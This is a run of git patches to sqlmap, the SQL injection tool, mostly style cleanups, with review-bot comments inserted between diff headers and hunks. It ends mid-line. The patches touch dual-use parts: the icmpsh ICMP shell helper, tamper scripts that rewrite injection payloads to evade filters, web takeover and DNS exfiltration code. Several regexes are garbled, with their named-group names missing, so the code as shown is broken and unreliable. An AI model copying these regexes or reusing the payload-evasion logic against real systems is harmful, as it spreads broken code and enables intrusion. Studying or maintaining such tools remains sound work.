From: Miroslav Stampar Date: Sat, 9 Jun 2018 22:59:08 +0200 Subject: [PATCH 165/428] Fixes #3142 --- lib/core/settings.py | 2 +- lib/core/update.py | 5 ++++- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3ae46d1ca63..353e7352b45 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.14" +VERSION = "1.2.6.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index ce5f87e4811..b9a54e54998 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -85,7 +85,10 @@ def update(): if not success: logger.error("update could not be completed") else: - os.chmod(os.path.join(directory, "sqlmap.py"), attrs) + try: + os.chmod(os.path.join(directory, "sqlmap.py"), attrs) + except OSError: + logger.warning("could not set the file attributes of '%s'" % os.path.join(directory, "sqlmap.py")) else: infoMsg = "updating sqlmap to the latest development revision from the " infoMsg += "GitHub repository" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index efe00f25356..1f0f33c6f03 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
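Review bot: The new `except OSError:` logs that the attributes could not be set but drops the reason, and `os.path.join(directory, "sqlmap.py")` is now spelled out twice; naming the path once and including the error text makes the warning actionable: `path = os.path.join(directory, "sqlmap.py")`, `except OSError as ex:`, `logger.warning("could not set the file attributes of '%s' (%s)" % (path, ex))`. The update is still reported as completed even when `sqlmap.py` ends up without its previous mode bits, which is a reasonable best-effort choice but deserves a comment such as `# best effort: a failed chmod must not fail the whole update (#3142)`. The surrounding `if not success ... else` belongs to `update()`, which starts outside the hunk.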
@@ -47,14 +47,14 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9962d6781b4c6d216b2982d3c2e0aa6a lib/core/settings.py +bb3cda01d9f6c71382beba250e0777fc lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -c54afa9950529a5974166464bfd4c34a lib/core/update.py +9d395b143be295a143eb5c9b926f3569 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From c268663bd9ed481a0f44f1defaaee860631f1558 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Sat, 9 Jun 2018 23:38:00 +0200 Subject: [PATCH 166/428] Minor code style updates --- extra/icmpsh/icmpsh_m.py | 2 +- extra/mssqlsig/update.py | 4 +-- extra/shutils/newlines.py | 7 ++--- extra/shutils/pep8.sh | 7 ----- extra/shutils/pycodestyle.sh | 7 +++++ extra/shutils/regressiontest.py | 4 +-- lib/core/agent.py | 8 +++--- lib/core/common.py | 12 ++++---- lib/core/decorators.py | 2 +- lib/core/option.py | 4 +-- lib/core/settings.py | 10 +++---- lib/core/target.py | 4 +-- lib/request/basic.py | 1 - lib/request/connect.py | 21 +++++++------- lib/takeover/web.py | 8 +++--- lib/techniques/dns/use.py | 2 +- lib/utils/api.py | 8 ++---- lib/utils/xrange.py | 6 ++-- sqlmap.py | 2 +- tamper/0x2char.py | 1 - tamper/between.py | 2 +- tamper/commentbeforeparentheses.py | 2 +- tamper/informationschemacomment.py | 2 +- tamper/multiplespaces.py | 4 +-- txt/checksum.md5 | 46 +++++++++++++++--------------- waf/cloudbric.py | 3 -- 26 files changed, 85 insertions(+), 94 deletions(-) delete mode 100755 extra/shutils/pep8.sh create mode 100755 extra/shutils/pycodestyle.sh diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py index 23a60b865c4..00fbd8801ee 100644 --- a/extra/icmpsh/icmpsh_m.py +++ b/extra/icmpsh/icmpsh_m.py @@ -80,7 +80,7 @@ def main(src, dst): cmd = '' # Wait for incoming replies - if sock in select.select([ sock ], [], [])[0]: + if sock in select.select([sock], [], [])[0]: buff = sock.recv(4096) if 0 == len(buff): diff --git a/extra/mssqlsig/update.py b/extra/mssqlsig/update.py index 5e0addab12b..84b94c54ee1 100644 --- a/extra/mssqlsig/update.py +++ b/extra/mssqlsig/update.py @@ -43,7 +43,7 @@ def updateMSSQLXML(): return - releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I) + releases = re.findall(r"class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I) releasesCount = len(releases) # Create the minidom document 
@@ -74,7 +74,7 @@ def updateMSSQLXML(): stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx] - servicepackVersion = re.findall("(7\.0|2000|2005|2008|2008 R2)*(.*?)[\r]*\n", mssqlVersionsReleaseString, re.I) + servicepackVersion = re.findall(r"(7\.0|2000|2005|2008|2008 R2)*(.*?)[\r]*\n", mssqlVersionsReleaseString, re.I) for servicePack, version in servicepackVersion: if servicePack.startswith(" "): diff --git a/extra/shutils/newlines.py b/extra/shutils/newlines.py index 5fd91f96926..c506e5f4808 100644 --- a/extra/shutils/newlines.py +++ b/extra/shutils/newlines.py @@ -4,16 +4,15 @@ # Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html import os -import re import sys def check(filepath): if filepath.endswith(".py"): - content = open(filepath, "rb").read() - #if re.search(r"\r?\n\r?\n", content): + content = open(filepath, "rb").read() + if "\n\n\n" in content: index = content.find("\n\n\n") - print filepath, repr(content[index-30:index+30]) + print filepath, repr(content[index - 30:index + 30]) if __name__ == "__main__": try: diff --git a/extra/shutils/pep8.sh b/extra/shutils/pep8.sh deleted file mode 100755 index 5c15f54916d..00000000000 --- a/extra/shutils/pep8.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'LICENSE' for copying permission - -# Runs pep8 on all python files (prerequisite: apt-get install pep8) -find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \; diff --git a/extra/shutils/pycodestyle.sh b/extra/shutils/pycodestyle.sh new file mode 100755 index 00000000000..79ab95743ce --- /dev/null +++ b/extra/shutils/pycodestyle.sh 
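Review bot: `content = open(filepath, "rb").read()` on the new side of the `newlines.py` hunk leaves the file object to be closed by garbage collection; since this script walks every `.py` in the tree, the usual `with open(filepath, "rb") as f: content = f.read()` makes the release explicit. The `print` also reports only the first `\n\n\n` per file with a fixed 30-byte window on each side; a short comment saying that only the first occurrence is shown would save a reader from wondering why there is no loop. The `__main__` block continues past the hunk.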
@@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle) +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pycodestyle --ignore=E501,E302,E305,E722,E402 '{}' \; diff --git a/extra/shutils/regressiontest.py b/extra/shutils/regressiontest.py index 6ff94d15621..6d8fb5acd09 100755 --- a/extra/shutils/regressiontest.py +++ b/extra/shutils/regressiontest.py @@ -27,7 +27,7 @@ SMTP_PORT = 25 SMTP_TIMEOUT = 30 FROM = "regressiontest@sqlmap.org" -#TO = "dev@sqlmap.org" +# TO = "dev@sqlmap.org" TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"] SUBJECT = "regression test started on %s using revision %s" % (START_TIME, getRevisionNumber()) TARGET = "debian" @@ -83,7 +83,7 @@ def main(): if stderr: failure_email("Execution of regression test failed with error:\n\n%s" % stderr) - failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout) + failed_tests = re.findall(r"running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout) for failed_test in failed_tests: title = failed_test[0] diff --git a/lib/core/agent.py b/lib/core/agent.py index 6f1380ac4b7..ebdbb6e4107 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py 
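Review bot: The `find … -exec pycodestyle … '{}' \;` in the new `pycodestyle.sh` spawns one interpreter per Python file; `-exec pycodestyle --ignore=E501,E302,E305,E722,E402 '{}' +` batches the paths into a single invocation and one report. The script also depends on being run from the repository root, because `find .` and the `./thirdparty` prune are relative to the current directory, so `cd "$(dirname "$0")/../.."` at the top, or a comment stating the expectation, would prevent silently linting the wrong tree. The ignored codes are unexplained; one comment naming what each tolerates (line length, blank-line rules, bare `except`, late imports) would make the list reviewable.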
@@ -198,7 +198,7 @@ def _(pattern, repl, string): regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "") retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString) else: - retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString) + retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), r"%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString) if retVal == paramString and urlencode(parameter) != parameter: retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString) @@ -535,7 +535,7 @@ def getFields(self, query): fieldsToCastStr = fieldsToCastStr or "" # Function - if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr: + if re.search(r"\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr: fieldsToCastList = [fieldsToCastStr] else: fieldsToCastList = splitFields(fieldsToCastStr) 
@@ -627,7 +627,7 @@ def concatQuery(self, query, unpack=True): concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM ")) concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:]) - concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), "\g<2>\g<1>\g<3>", concatenatedQuery) + concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), r"\g<2>\g<1>\g<3>", concatenatedQuery) elif fieldsSelect: concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) concatenatedQuery += "||'%s'" % kb.chars.stop @@ -639,7 +639,7 @@ def concatQuery(self, query, unpack=True): concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.chars.start, 1) concatenatedQuery += "+'%s'" % kb.chars.stop elif fieldsSelectTop: - topNum = re.search("\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1) + topNum = re.search(r"\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1) concatenatedQuery = concatenatedQuery.replace("SELECT TOP %s " % topNum, "TOP %s '%s'+" % (topNum, kb.chars.start), 1) concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.chars.stop, 1) elif fieldsSelectCase: diff --git a/lib/core/common.py b/lib/core/common.py index f3771e19ab5..39a7ae92b20 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1317,7 +1317,7 @@ def parseTargetDirect(): remote = False for dbms in SUPPORTED_DBMS: - details = re.search("^(?P%s)://(?P(?P.+?)\:(?P.*)\@)?(?P(?P[\w.-]+?)\:(?P[\d]+)\/)?(?P[\w\d\ \:\.\_\-\/\\\\]+?)$" % dbms, conf.direct, re.I) + details = re.search(r"^(?P%s)://(?P(?P.+?)\:(?P.*)\@)?(?P(?P[\w.-]+?)\:(?P[\d]+)\/)?(?P[\w\d\ \:\.\_\-\/\\]+?)$" % dbms, conf.direct, re.I) if details: conf.dbms = details.group("dbms") 
@@ -1440,7 +1440,7 @@ def parseTargetUrl(): errMsg += "in the hostname part" raise SqlmapGenericException(errMsg) - hostnamePort = urlSplit.netloc.split(":") if not re.search(r"\[.+\]", urlSplit.netloc) else filter(None, (re.search("\[.+\]", urlSplit.netloc).group(0), re.search(r"\](:(?P\d+))?", urlSplit.netloc).group("port"))) + hostnamePort = urlSplit.netloc.split(":") if not re.search(r"\[.+\]", urlSplit.netloc) else filter(None, (re.search(r"\[.+\]", urlSplit.netloc).group(0), re.search(r"\](:(?P\d+))?", urlSplit.netloc).group("port"))) conf.scheme = (urlSplit.scheme.strip().lower() or "http") if not conf.forceSSL else "https" conf.path = urlSplit.path.strip() @@ -3355,7 +3355,7 @@ def createGithubIssue(errMsg, excMsg): _ = re.sub(r"'[^']+'", "''", excMsg) _ = re.sub(r"\s+line \d+", "", _) - _ = re.sub(r'File ".+?/(\w+\.py)', "\g<1>", _) + _ = re.sub(r'File ".+?/(\w+\.py)', r"\g<1>", _) _ = re.sub(r".+\Z", "", _) key = hashlib.md5(_).hexdigest()[:8] @@ -3522,6 +3522,7 @@ def _(value): regex = r"%s\b" % regex _retVal = [retVal] + def _thread(regex): try: _retVal[0] = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, _retVal[0]) @@ -3957,6 +3958,7 @@ class _(StringIO): def __init__(self, content, url): StringIO.__init__(self, unicodeencode(content, kb.pageEncoding) if isinstance(content, unicode) else content) self._url = url + def geturl(self): return self._url @@ -4082,7 +4084,7 @@ def getHostHeader(url): retVal = urlparse.urlparse(url).netloc if re.search(r"http(s)?://\[.+\]", url, re.I): - retVal = extractRegexResult("http(s)?://\[(?P.+)\]", url) + retVal = extractRegexResult(r"http(s)?://\[(?P.+)\]", url) elif any(retVal.endswith(':%d' % _) for _ in (80, 443)): retVal = retVal.split(':')[0] 
@@ -4339,7 +4341,7 @@ def resetCookieJar(cookieJar): except cookielib.LoadError, msg: errMsg = "there was a problem loading " - errMsg += "cookies file ('%s')" % re.sub(r"(cookies) file '[^']+'", "\g<1>", str(msg)) + errMsg += "cookies file ('%s')" % re.sub(r"(cookies) file '[^']+'", r"\g<1>", str(msg)) raise SqlmapGenericException(errMsg) def decloakToTemp(filename): diff --git a/lib/core/decorators.py b/lib/core/decorators.py index 1bf5d512798..0dfdbdaa3ec 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -38,4 +38,4 @@ def _(*args, **kwargs): return result - return _ \ No newline at end of file + return _ diff --git a/lib/core/option.py b/lib/core/option.py index 23daf5761ad..75bd66eac45 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1722,7 +1722,7 @@ def _cleanupOptions(): if conf.testFilter: conf.testFilter = conf.testFilter.strip('*+') - conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter) + conf.testFilter = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testFilter) try: re.compile(conf.testFilter) @@ -1731,7 +1731,7 @@ def _cleanupOptions(): if conf.testSkip: conf.testSkip = conf.testSkip.strip('*+') - conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip) + conf.testSkip = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testSkip) try: re.compile(conf.testSkip) diff --git a/lib/core/settings.py b/lib/core/settings.py index 353e7352b45..1d86bc30d6f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.15" +VERSION = "1.2.6.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
@@ -364,7 +364,7 @@ URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z" # Regex used for masking sensitive data -SENSITIVE_DATA_REGEX = "(\s|=)(?P[^\s=]*%s[^\s]*)\s" +SENSITIVE_DATA_REGEX = r"(\s|=)(?P[^\s=]*%s[^\s]*)\s" # Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the inside) SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred") @@ -388,7 +388,7 @@ CUSTOM_INJECTION_MARK_CHAR = '*' # Other way to declare injection position -INJECT_HERE_REGEX = '(?i)%INJECT[_ ]?HERE%' +INJECT_HERE_REGEX = r"(?i)%INJECT[_ ]?HERE%" # Minimum chunk length used for retrieving data over error based payloads MIN_ERROR_CHUNK_LENGTH = 8 @@ -487,7 +487,7 @@ REFLECTIVE_MISS_THRESHOLD = 20 # Regular expression used for extracting HTML title -HTML_TITLE_REGEX = "(?P<result>[^<]+)" +HTML_TITLE_REGEX = r"(?P<result>[^<]+)" # Table used for Base64 conversion in WordPress hash cracking routine ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" @@ -631,7 +631,7 @@ DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">" # Regular expression used for recognition of file inclusion errors -FI_ERROR_REGEX = "(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}" +FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}" # Length of prefix and suffix used in non-SQLI heuristic checks NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6 diff --git a/lib/core/target.py b/lib/core/target.py index abddc942834..8e38389b94e 100644 --- a/lib/core/target.py +++ b/lib/core/target.py 
@@ -148,8 +148,8 @@ def process(match, repl): match = re.search(r'(?P[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data) if match and not (conf.testParameter and match.group("name") not in conf.testParameter): _ = match.group(2) - _ = re.sub(r'("[^"]+)"', '\g<1>%s"' % kb.customInjectionMark, _) - _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % kb.customInjectionMark, _) + _ = re.sub(r'("[^"]+)"', r'\g<1>%s"' % kb.customInjectionMark, _) + _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', r'\g<0>%s' % kb.customInjectionMark, _) conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _)) kb.postHint = POST_HINT.JSON diff --git a/lib/request/basic.py b/lib/request/basic.py index 931e8becf57..9dd83434323 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -35,7 +35,6 @@ from lib.core.exception import SqlmapCompressionException from lib.core.settings import BLOCKED_IP_REGEX from lib.core.settings import DEFAULT_COOKIE_DELIMITER -from lib.core.settings import DEV_EMAIL_ADDRESS from lib.core.settings import EVENTVALIDATION_REGEX from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE from lib.core.settings import META_CHARSET_REGEX diff --git a/lib/request/connect.py b/lib/request/connect.py index 6bdb5b69e46..3ad2ed32d3e 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -8,7 +8,6 @@ import binascii import compiler import httplib -import json import keyword import logging import re @@ -408,8 +407,10 @@ def getPage(**kwargs): ws.close() code = ws.status status = httplib.responses[code] + class _(dict): pass + responseHeaders = _(ws.getheaders()) responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()] 
@@ -736,10 +737,10 @@ class _(dict): if conn and getattr(conn, "redurl", None): _ = urlparse.urlsplit(conn.redurl) _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) - requestMsg = re.sub(r"(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1) + requestMsg = re.sub(r"(\n[A-Z]+ ).+?( HTTP/\d)", r"\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1) if kb.resendPostOnRedirect is False: - requestMsg = re.sub(r"(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg) + requestMsg = re.sub(r"(\[#\d+\]:\n)POST ", r"\g<1>GET ", requestMsg) requestMsg = re.sub(r"(?i)Content-length: \d+\n", "", requestMsg) requestMsg = re.sub(r"(?s)\n\n.+", "\n", requestMsg) 
@@ -1104,33 +1105,33 @@ def _randomizeParameter(paramString, randomParameter): if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP): if re.search(r"<%s\b" % re.escape(name), post): found = True - post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(%s\g<3>" % value.replace('\\', r'\\'), post) + post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(%s\g<3>" % value.replace('\\', r'\\'), post) elif re.search(r"\b%s>" % re.escape(name), post): found = True - post = re.sub(r"(?s)(\b%s>)(.*?)()" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post) + post = re.sub(r"(?s)(\b%s>)(.*?)()" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post) regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name) if not found and re.search(regex, (post or "")): found = True - post = re.sub(regex, "\g<1>\g<2>%s" % value.replace('\\', r'\\'), post) + post = re.sub(regex, r"\g<1>\g<2>%s" % value.replace('\\', r'\\'), post) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter)) if not found and re.search(regex, (post or "")): found = True - post = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post) + post = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post) if re.search(regex, (get or "")): found = True - get = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), get) + get = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), get) if re.search(regex, (query or "")): found = True - uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri) + uri = re.sub(regex.replace(r"\A", r"\?"), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), re.escape(name), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)) if re.search(regex, (cookie or "")): found = True - cookie = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie) + cookie = re.sub(regex, 
r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie) if not found: if post is not None: diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 8f5b5616d08..91e6bd9a458 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -219,7 +219,7 @@ def webInit(self): finally: been.add(url) - url = re.sub(r"(\.\w+)\Z", "~\g<1>", conf.url) + url = re.sub(r"(\.\w+)\Z", r"~\g<1>", conf.url) if url not in been: try: page, _, _ = Request.getPage(url=url, raise404=False, silent=True) @@ -231,7 +231,7 @@ def webInit(self): for place in (PLACE.GET, PLACE.POST): if place in conf.parameters: - value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place]) + value = re.sub(r"(\A|&)(\w+)=", r"\g<2>[]=", conf.parameters[place]) if "[]" in value: page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False) parseFilePaths(page) @@ -243,12 +243,12 @@ def webInit(self): cookie = headers[HTTP_HEADER.SET_COOKIE] if cookie: - value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie) + value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie) if value != cookie: page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) parseFilePaths(page) - value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie) + value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=", cookie) if value != cookie: page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) parseFilePaths(page) diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py index 3cf607b5451..a90967e99d5 100644 --- a/lib/techniques/dns/use.py +++ b/lib/techniques/dns/use.py 
@@ -83,7 +83,7 @@ def dnsUse(payload, expression): _ = conf.dnsServer.pop(prefix, suffix) if _: - _ = extractRegexResult("%s\.(?P.+)\.%s" % (prefix, suffix), _, re.I) + _ = extractRegexResult(r"%s\.(?P.+)\.%s" % (prefix, suffix), _, re.I) _ = decodeHexValue(_) output = (output or "") + _ offset += len(_) diff --git a/lib/utils/api.py b/lib/utils/api.py index cbdce996790..ee0cab9c71a 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -498,9 +498,7 @@ def scan_stop(taskid): Stop a scan """ - if (taskid not in DataStore.tasks or - DataStore.tasks[taskid].engine_process() is None or - DataStore.tasks[taskid].engine_has_terminated()): + if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()): logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) @@ -515,9 +513,7 @@ def scan_kill(taskid): Kill a scan """ - if (taskid not in DataStore.tasks or - DataStore.tasks[taskid].engine_process() is None or - DataStore.tasks[taskid].engine_has_terminated()): + if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()): logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py index 98338863b6b..9ae8e55860b 100644 --- a/lib/utils/xrange.py +++ b/lib/utils/xrange.py 
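Review bot: Collapsing the three-part predicate onto one line in both `scan_stop` and `scan_kill` leaves the same `taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()` duplicated verbatim, now at roughly 150 columns; a small helper such as `def _is_active_task(taskid): return taskid in DataStore.tasks and DataStore.tasks[taskid].engine_process() is not None and not DataStore.tasks[taskid].engine_has_terminated()` keeps both route handlers to `if not _is_active_task(taskid):` and gives the condition a name. The remainder of both handlers is outside the hunk.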
@@ -49,12 +49,10 @@ def __hash__(self): return hash(self._slice) def __cmp__(self, other): - return (cmp(type(self), type(other)) or - cmp(self._slice, other._slice)) + return (cmp(type(self), type(other)) or cmp(self._slice, other._slice)) def __repr__(self): - return '%s(%r, %r, %r)' % (type(self).__name__, - self.start, self.stop, self.step) + return '%s(%r, %r, %r)' % (type(self).__name__, self.start, self.stop, self.step) def __len__(self): return self._len() diff --git a/sqlmap.py b/sqlmap.py index 4d1a16a4359..618ea99fb79 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -397,4 +397,4 @@ def main(): main() else: # cancelling postponed imports (because of Travis CI checks) - from lib.controller.controller import start \ No newline at end of file + from lib.controller.controller import start diff --git a/tamper/0x2char.py b/tamper/0x2char.py index f08a434e59c..bc3b7a433f9 100644 --- a/tamper/0x2char.py +++ b/tamper/0x2char.py @@ -7,7 +7,6 @@ import re -from lib.core.data import kb from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL diff --git a/tamper/between.py b/tamper/between.py index e64628f127f..d805523a216 100644 --- a/tamper/between.py +++ b/tamper/between.py @@ -46,7 +46,7 @@ def tamper(payload, **kwargs): _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5)) retVal = retVal.replace(match.group(0), _) else: - retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", " NOT BETWEEN 0 AND \g<1>", payload) + retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) if retVal 